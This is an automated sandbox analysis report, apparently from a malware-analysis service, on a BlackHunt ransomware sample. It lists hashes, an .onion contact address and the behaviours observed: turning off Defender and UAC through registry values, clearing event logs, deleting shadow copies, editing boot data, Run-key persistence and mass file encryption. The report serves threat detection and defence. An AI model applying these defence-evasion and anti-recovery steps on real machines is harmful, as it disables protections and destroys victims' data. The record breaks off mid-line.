Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:28
Static task
static1
Behavioral task
behavioral1
Sample
a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe
Resource
win10v2004-20231222-en
General
-
Target
a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe
-
Size
707KB
-
MD5
1724bd196cffa394e96d7cae59ba0389
-
SHA1
ffff02a0f0c7a1e06eb5579775184c0b28f23a92
-
SHA256
a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f
-
SHA512
34847168f2e0505451445c04e466b12dd526ef2fdd5671ded292d21342d45bf2429cf7275298453d84e4572a40381a54f90cb655ab734357b1e60d85e451034e
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1X83vnh:6uaTmkZJ+naie5OTamgEoKxLW+fh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1484 fsutil.exe 344 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2168 wevtutil.exe 3260 wevtutil.exe 3036 wevtutil.exe 3420 wevtutil.exe 3956 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1936 bcdedit.exe 2620 bcdedit.exe 2536 bcdedit.exe 1888 bcdedit.exe -
Renames multiple (2907) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2504 wbadmin.exe 2524 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 4032 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\Z: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\B: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\H: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\J: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\N: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\R: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\P: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\S: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\G: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\X: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\V: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\I: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\A: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\K: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\L: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\M: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\T: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\Y: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\U: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\W: a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_ReadMe.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#BlackHunt_Private.key a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_Private.key a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_ReadMe.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_Private.key a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#BlackHunt_ReadMe.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#BlackHunt_ReadMe.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain.wmv a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.hta a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#BlackHunt_ReadMe.txt a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1572 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 776 vssadmin.exe 2680 vssadmin.exe 2560 vssadmin.exe 2672 vssadmin.exe 3684 vssadmin.exe 2872 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3780 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4072 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2792 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Token: SeRestorePrivilege 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Token: SeBackupPrivilege 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Token: SeTakeOwnershipPrivilege 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Token: SeAuditPrivilege 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Token: SeSecurityPrivilege 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Token: SeIncBasePriorityPrivilege 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe Token: SeBackupPrivilege 328 vssvc.exe Token: SeRestorePrivilege 328 vssvc.exe Token: SeAuditPrivilege 328 vssvc.exe Token: SeBackupPrivilege 2728 wbengine.exe Token: SeRestorePrivilege 2728 wbengine.exe Token: SeSecurityPrivilege 2728 wbengine.exe Token: SeSecurityPrivilege 2168 wevtutil.exe Token: SeBackupPrivilege 2168 wevtutil.exe Token: SeSecurityPrivilege 3956 wevtutil.exe Token: SeSecurityPrivilege 3420 wevtutil.exe Token: SeBackupPrivilege 3420 wevtutil.exe Token: SeBackupPrivilege 3956 wevtutil.exe Token: SeSecurityPrivilege 3036 wevtutil.exe Token: SeBackupPrivilege 3036 wevtutil.exe Token: SeSecurityPrivilege 3260 wevtutil.exe Token: SeBackupPrivilege 3260 wevtutil.exe Token: SeDebugPrivilege 3780 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1716 wrote to memory of 2716 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 29 PID 1716 wrote to memory of 2716 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 29 PID 1716 wrote to memory of 2716 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 29 PID 1716 wrote to memory of 2716 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 29 PID 1716 wrote to memory of 2784 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 153 PID 1716 wrote to memory of 2784 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 153 PID 1716 wrote to memory of 2784 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 153 PID 1716 wrote to memory of 2784 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 153 PID 2716 wrote to memory of 2720 2716 cmd.exe 151 PID 2716 wrote to memory of 2720 2716 cmd.exe 151 PID 2716 wrote to memory of 2720 2716 cmd.exe 151 PID 1716 wrote to memory of 2940 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 150 PID 1716 wrote to memory of 2940 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 150 PID 1716 wrote to memory of 2940 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 150 PID 1716 wrote to memory of 2940 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 150 PID 1716 wrote to memory of 2828 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 148 PID 1716 wrote to memory of 2828 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 148 PID 1716 wrote to memory of 2828 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 148 PID 1716 wrote to memory of 2828 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 148 PID 2784 wrote to memory of 2572 2784 cmd.exe 146 PID 2784 wrote to memory of 2572 2784 cmd.exe 146 PID 2784 wrote to memory of 2572 2784 cmd.exe 146 PID 1716 wrote to memory of 2780 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 213 PID 1716 wrote to memory of 2780 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 213 PID 1716 wrote to memory of 2780 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 213 PID 1716 wrote to memory of 2780 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 213 PID 1716 wrote to memory of 2600 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 143 PID 1716 wrote to memory of 2600 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 143 PID 1716 wrote to memory of 2600 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 143 PID 1716 wrote to memory of 2600 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 143 PID 2940 wrote to memory of 2892 2940 cmd.exe 142 PID 2940 wrote to memory of 2892 2940 cmd.exe 142 PID 2940 wrote to memory of 2892 2940 cmd.exe 142 PID 1716 wrote to memory of 2024 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 30 PID 1716 wrote to memory of 2024 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 30 PID 1716 wrote to memory of 2024 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 30 PID 1716 wrote to memory of 2024 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 30 PID 1716 wrote to memory of 2440 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 141 PID 1716 wrote to memory of 2440 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 141 PID 1716 wrote to memory of 2440 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 141 PID 1716 wrote to memory of 2440 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 141 PID 2828 wrote to memory of 2732 2828 cmd.exe 139 PID 2828 wrote to memory of 2732 2828 cmd.exe 139 PID 2828 wrote to memory of 2732 2828 cmd.exe 139 PID 1716 wrote to memory of 2736 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 160 PID 1716 wrote to memory of 2736 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 160 PID 1716 wrote to memory of 2736 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 160 PID 1716 wrote to memory of 2736 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 160 PID 1716 wrote to memory of 2568 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 33 PID 1716 wrote to memory of 2568 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 33 PID 1716 wrote to memory of 2568 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 33 PID 1716 wrote to memory of 2568 1716 a8ffb25471c001f990b8df4a4ef565dbc69ac9241a5f17d1bda6f349c227b26f.exe 33 PID 2780 wrote to memory of 2596 2780 cmd.exe 136 PID 2780 wrote to memory of 2596 2780 cmd.exe 136 PID 2780 wrote to memory 